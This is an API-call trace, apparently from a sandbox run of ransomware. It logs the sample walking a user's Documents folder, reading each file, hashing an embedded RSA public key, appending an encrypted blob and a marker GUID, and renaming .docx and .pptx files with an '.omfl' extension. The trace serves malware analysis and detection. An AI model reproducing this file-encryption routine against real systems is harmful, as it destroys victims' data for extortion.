ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0x18343, lpOverlapped=0x0) returned 1 [0131.054] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.054] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1ef) returned 0xdd0bd00 [0131.054] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.054] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.054] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d3088) returned 1 [0131.055] CryptCreateHash (in: hProv=0x49d3088, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0131.055] CryptHashData (hHash=0xdce3a70, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0131.055] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0131.055] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0131.055] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0131.055] GetLastError () returned 0x0 [0131.055] CryptDestroyHash (hHash=0xdce3a70) returned 1 [0131.055] CryptReleaseContext (hProv=0x49d3088, dwFlags=0x0) returned 1 [0131.056] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0131.056] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0131.056] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0131.056] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0131.057] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd20488 [0131.057] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0131.057] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x18343, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.057] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd24260*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24260*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0131.058] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0131.058] WriteFile (in: hFile=0x5c8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0131.058] CloseHandle (hObject=0x5c8) returned 1 [0131.060] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3088 [0131.060] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x880) returned 0xdd29950 [0131.060] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rff9QSHCPUIE.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\rff9qshcpuie.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rff9QSHCPUIE.pptx.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\rff9qshcpuie.pptx.omfl")) returned 1 [0131.062] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x754935f0, ftCreationTime.dwHighDateTime=0x1d5d334, ftLastAccessTime.dwLowDateTime=0x5c2dc500, ftLastAccessTime.dwHighDateTime=0x1d5d39c, ftLastWriteTime.dwLowDateTime=0x5c2dc500, ftLastWriteTime.dwHighDateTime=0x1d5d39c, nFileSizeHigh=0x0, nFileSizeLow=0x30d7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sahXf1ie.docx", cAlternateFileName="SAHXF1~1.DOC")) returned 1 [0131.062] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5f60 [0131.063] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8e) returned 0xdd14728 [0131.063] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\sahXf1ie.docx") returned=".docx" [0131.063] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\sahXf1ie.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\sahxf1ie.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0131.063] GetFileSizeEx (in: hFile=0x5c8, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=12503) returned 1 [0131.063] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0131.066] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x30b1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.066] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0131.067] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb98 [0131.067] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0x30d7, lpOverlapped=0x0) returned 1 [0131.067] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.067] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1ef) returned 0xdd0bd00 [0131.067] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.068] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.068] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d3088) returned 1 [0131.069] CryptCreateHash (in: hProv=0x49d3088, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0131.069] CryptHashData (hHash=0xdce3a70, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0131.069] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0131.069] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0131.069] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0131.069] GetLastError () returned 0x0 [0131.069] CryptDestroyHash (hHash=0xdce3a70) returned 1 [0131.069] CryptReleaseContext (hProv=0x49d3088, dwFlags=0x0) returned 1 [0131.069] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0131.069] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0131.069] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0131.069] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0131.069] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd20488 [0131.069] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0131.070] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x30d7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.070] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd24260*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24260*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0131.070] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0131.070] WriteFile (in: hFile=0x5c8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0131.070] CloseHandle (hObject=0x5c8) returned 1 [0131.071] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0x74d2e60 [0131.072] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x880) returned 0xdd29950 [0131.072] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\sahXf1ie.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\sahxf1ie.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\sahXf1ie.docx.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\sahxf1ie.docx.omfl")) returned 1 [0131.074] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97ecb280, ftCreationTime.dwHighDateTime=0x1d59aa9, ftLastAccessTime.dwLowDateTime=0x8f90f1a0, ftLastAccessTime.dwHighDateTime=0x1d5ce89, ftLastWriteTime.dwLowDateTime=0x8f90f1a0, ftLastWriteTime.dwHighDateTime=0x1d5ce89, nFileSizeHigh=0x0, nFileSizeLow=0x12410, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sdFIn-.pptx", cAlternateFileName="SDFIN-~1.PPT")) returned 1 [0131.074] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5f60 [0131.074] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8e) returned 0xdd14728 [0131.074] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\sdFIn-.pptx") returned=".pptx" [0131.074] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\sdFIn-.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\sdfin-.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0131.074] GetFileSizeEx (in: hFile=0x5c8, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=74768) returned 1 [0131.074] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0131.078] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x123ea, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.078] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0131.079] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb98 [0131.079] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0131.079] SetFilePointer (in: hFile=0x5c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.079] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0x12410, lpOverlapped=0x0) returned 1 [0131.080] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.080] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1ef) returned 0xdd0bd00 [0131.080] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.080] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.080] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d3088) returned 1 [0131.081] CryptCreateHash (in: hProv=0x49d3088, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0131.081] CryptHashData (hHash=0xdce3a70, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0131.081] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0131.081] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0131.081] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0131.081] GetLastError () returned 0x0 [0131.081] CryptDestroyHash (hHash=0xdce3a70) returned 1 [0131.081] CryptReleaseContext (hProv=0x49d3088, dwFlags=0x0) returned 1 [0131.081] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0131.081] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0131.081] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0131.081] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0131.081] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0131.081] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0131.081] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb98 [0131.081] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x12410) returned 0xdd35410 [0131.082] SetFilePointer (in: hFile=0x5c8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0131.082] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0131.082] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0xdd0bd00 [0131.082] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0131.082] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0x74e4b90 [0131.082] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08ea8 [0131.082] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdd34860 [0131.082] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16ec0 [0131.082] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdd348a8 [0131.082] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16ed8 [0131.082] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16f08 [0131.082] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16a40 [0131.082] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16f20 [0131.082] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x24) returned 0xdd0d930 [0131.083] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x158) returned 0xdd27968 [0131.083] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd20488 [0131.083] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0131.083] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16f08 | out: hHeap=0x4970000) returned 1 [0131.083] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16f20 | out: hHeap=0x4970000) returned 1 [0131.083] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16a40 | out: hHeap=0x4970000) returned 1 [0131.083] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0d930 | out: hHeap=0x4970000) returned 1 [0131.083] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce69c8 | out: hHeap=0x4970000) returned 1 [0131.083] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16a40 [0131.083] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e58 [0131.083] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16f20 [0131.083] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cdb88 [0131.083] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x9) returned 0xdd16f08 [0131.083] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e78 [0131.083] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10e) returned 0x74e3210 [0131.083] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9278 [0131.083] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08cc8 [0131.083] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdf28 [0131.083] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x104) returned 0x7503670 [0131.083] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cf068 [0131.083] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e38 [0131.083] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0131.083] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16f20 | out: hHeap=0x4970000) returned 1 [0131.083] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0131.083] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16f08 | out: hHeap=0x4970000) returned 1 [0131.083] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdb88 | out: hHeap=0x4970000) returned 1 [0131.083] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0131.083] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16a40 | out: hHeap=0x4970000) returned 1 [0131.084] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9278 | out: hHeap=0x4970000) returned 1 [0131.084] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08ea8 | out: hHeap=0x4970000) returned 1 [0131.084] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd20488 | out: hHeap=0x4970000) returned 1 [0131.084] GetCurrentThreadId () returned 0x618 [0131.084] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24260 [0131.084] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x82) returned 